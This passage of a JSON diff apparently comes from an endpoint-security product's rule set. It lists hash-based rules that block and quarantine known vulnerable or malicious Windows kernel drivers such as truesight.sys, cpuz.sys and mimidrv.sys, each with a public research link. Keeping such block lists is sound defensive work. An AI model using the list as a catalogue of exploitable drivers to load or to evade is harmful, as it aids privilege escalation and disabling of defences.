"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825220Z", + "creation_date": "2026-03-23T11:45:31.825224Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825232Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f307933a0d6a66dbf391be25208cdb286720ba443887f6d3d7abf3bbc494ebe1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0416042-feaa-570d-9c09-c7629be61d3f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473815Z", + "creation_date": "2026-03-23T11:45:30.473818Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473826Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "7f8cabb101d8ee0d76444fa4caa115b88b53ad8bd95516cae563bf92b910fa99", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b04aa3dd-d6e3-5388-8dc2-7572b5114c33", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160794Z", + "creation_date": "2026-03-23T11:45:31.160797Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160802Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b09543f14f144b11c4628de5a69aef95d4fa2682759498bb7b267fde8edefb8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b04c601b-6a4b-5178-9a28-8ecde24948a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978207Z", + "creation_date": "2026-03-23T11:45:29.978210Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978218Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "640eeb3128ae5c353034ee29cb656d38c41353743396c1c936afd4d04a782087", + "comment": "Vulnerable Kernel Driver (aka t7.sys) [https://www.loldrivers.io/drivers/7196366e-04f0-4aaf-9184-ed0a0d21a75f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0536d73-9dbf-558b-a122-7766f4723d25", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818736Z", + "creation_date": "2026-03-23T11:45:30.818738Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818744Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe9c104a3bb9184a8f792f3f8a3e90d83b9f19cf83cd93d116b02e17f54d727d", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b058cd85-82dd-5835-8c8c-472b01fcb7a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477035Z", + "creation_date": "2026-03-23T11:45:31.477039Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477049Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b1283f50cc1b7853ca7fdee3cd3c8b3d011ce3aabb4d6e83ec9217cfdbc322d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b069b788-316d-5ef6-b7b1-4a43387769be", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151414Z", + "creation_date": "2026-03-23T11:45:31.151417Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151426Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b96332b61a4792bc73266b1e9f21fbef0bd0797a9fba283397285f5230028318", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b06dddd3-9b6d-5f0b-9ce6-0fe8c2ecb925", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468406Z", + "creation_date": "2026-03-23T11:45:30.468409Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468418Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5e1c7bdb1fa71145a0704a5f00d894043a7754cb82d1d8213cb6a899bd767cab", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b06fbcd9-6018-542a-87ce-52e97c712370", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817347Z", + "creation_date": "2026-03-23T11:45:30.817349Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817354Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42f468244050bafdcfc061c0eb468fd78267f93404b8703353d68fdca8b4355e", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0895aeb-4d37-5818-9b8f-ca4f6ccf4c52", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486858Z", + "creation_date": "2026-03-23T11:45:31.486861Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486888Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "a0ef83ed123736df20c481c60a146b1cd2d77aa208b3fd7afa97e473fd818307", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0bac34d-09a7-5b2d-ba66-17b7e555e11d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968350Z", + "creation_date": "2026-03-23T11:45:29.968351Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b45d78a6780f125143dbd198ac2439be78424e7ae37a4234541ecb327dc190c1", + "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0bdafa1-f131-56b9-bfca-c7335ce4845d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486694Z", + "creation_date": "2026-03-23T11:45:31.486697Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486705Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "99b45b19810074d650a66ea02e45c47c2d700fecb0af241f17c2a668022fc5bf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0c12e72-aed0-5694-bb56-b983a18e86ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140764Z", + "creation_date": "2026-03-23T11:45:31.140766Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140771Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fdfe2efb742559b5ab8c16f8db3cfd184ade59496e50d95bc6c6e12ae1165a83", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0c4eebc-415a-5783-ad1e-26e4f2668eaf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476769Z", + "creation_date": "2026-03-23T11:45:30.476773Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476782Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5ebfc2c2fc43fc34cc98378f627e6147af473cb37076f4c2ba278210bd88b2bf", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0cc75f3-af79-59e6-80e6-43d76c7d0348", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826007Z", + "creation_date": "2026-03-23T11:45:31.826009Z", 
+ "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826015Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6484833b1554e5113239e79a6ea3265863e4a9e03eb3817b6e15c9bd4cfdacc0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0d648ed-730b-5b1d-8614-ebe8b7880d39", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152443Z", + "creation_date": "2026-03-23T11:45:31.152445Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152453Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8c92f5d0513886ce03745e30a704c34a64f3f70cde9d662f0d655143b3086e4f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"b0e3e3d5-051f-56b4-87ad-cc07e4efe3ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144563Z", + "creation_date": "2026-03-23T11:45:31.144565Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144570Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "627ef26e42d9c857196d4028d87ca9f7bdb6e6a034a1e157272556840b7e814c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0e4c212-df36-589d-85de-aba2df9a1aa4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146848Z", + "creation_date": "2026-03-23T11:45:31.146850Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.146856Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "53b09a961939d2aa82a329634552ad47eb39cbf920454987187bc3bbf29f02da", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0ec92f6-8d3a-5d6f-93c4-4bfc618f6f69", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146175Z", + "creation_date": "2026-03-23T11:45:32.146179Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146187Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df72cb33a23ae8f6f9dc64bb738fcfaea959368ce05cf399f3c7db5e90104bd7", + "comment": "Malicious Kernel Driver (aka 2.sys) [https://www.loldrivers.io/drivers/bb1f80f3-d2fd-463e-9403-57c919bd976b/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0f50ea9-1782-5ece-8698-046bbf53093d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480209Z", + "creation_date": "2026-03-23T11:45:30.480211Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480217Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a369942ce8d4b70ebf664981e12c736ec980dbe5a74585dd826553c4723b1bce", + "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0f78f32-f498-5dff-bf1f-0b4a0ce0c17d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150286Z", + "creation_date": "2026-03-23T11:45:31.150288Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150293Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"7bc0fdb1d47f9a657a3af869fe3cbc6895b118875cc448c4406f9a066c9e610e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0f87ddd-022f-55e1-8b6a-ccb03d2d0266", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160456Z", + "creation_date": "2026-03-23T11:45:31.160458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160464Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72ca577f73bb6c1c423ca9169850227765f39ae86be8d89d816294b77332079d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0fb0b76-6396-575d-bed7-47a52216575b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830402Z", + "creation_date": "2026-03-23T11:45:30.830405Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830410Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "56749ce01bca38992e4f639991a191463712f04a38ed7e92a737f7077c961392", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b10207c7-11e6-54f0-9782-9542eb82bf27", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143335Z", + "creation_date": "2026-03-23T11:45:32.143338Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143343Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "08209cd92723526d56863e89f283750e2ee57c69db37ae501aa889c0c60bb552", + "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) 
[https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1153b67-1bd3-53a6-bf61-fc6fce7d604c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828011Z", + "creation_date": "2026-03-23T11:45:30.828013Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828019Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d4093dac36e4568b942aa3d409b6b195b98b66f75221cc89ae750f690c901315", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 